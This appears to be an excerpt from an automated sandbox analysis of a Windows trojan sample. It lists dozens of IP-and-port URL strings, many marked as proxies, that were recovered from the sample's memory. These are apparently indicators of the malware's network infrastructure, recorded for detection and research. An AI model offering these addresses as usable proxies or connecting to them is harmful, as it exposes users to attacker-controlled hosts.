                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C762A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5385
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C762A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5385://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:20003
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:20003://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C842A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:5369
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8430000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:5369://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:6227
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:6227://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:8459
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:8459://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.172:15991
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.172:15991://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:10677
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:10677://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A3C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:1475
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:1475://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:27707
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:27707://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:3283
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:3283://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:22669
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:22669://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:11351
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:11351://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:15265
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:15265://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:15863
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:15863://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:16355
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:16355://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:16757
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:16757://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7618000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C760E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:18939
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C760E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:18939://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:19713
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:19713://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F66000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:20057
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:20057://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:20421
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:20421://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:22575
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:22575://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:24091
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:24091://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:25421
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:25421://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:2597
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:2597://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:26447
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:26447://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90A2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9096000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:3093
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9096000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:3093://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:3279
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:3279://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:6047
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:6047://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:6047x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7664000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:7249
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C766B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:7249://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:7481
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:7481://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:8609
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:8609://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DCC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:8833
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:8833://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.91:18031
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.91:18031://proxyHJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:16757
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:16757://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:1839
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:1839://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:18445
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:18445://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC7C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:22575
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC7C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:22575://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:26077
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:26077://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.93:25873
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.93:25873://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.94:24271
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.94:24271://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.94:2597
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.94:2597://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10121
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10121://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10801
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10801://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:12529
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:12529://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13005
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13005://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C695D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C695D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1707
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1707://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1731
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1731://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:19771
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:19771://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:20325
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:20325://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:23213
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:23213://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2481
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2481://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:25639://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:25639HJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:25757
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:25757://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:25823
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:25823://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:26193
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:26193://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:29053
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:29053://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:29075
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:29075://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30389
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30389://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC04D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:31831
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:31831://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:31871
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:31871://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:3251
